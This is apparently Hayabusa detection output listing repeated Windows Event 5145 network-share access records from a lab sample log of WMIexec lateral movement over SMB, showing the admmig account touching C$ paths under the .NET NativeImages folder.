0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:31.795 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.795 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.795 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.795 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.811 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.858 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.858 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.858 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.858 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.858 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:31.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d | IP Addr: 10.23.23.9 | LID: 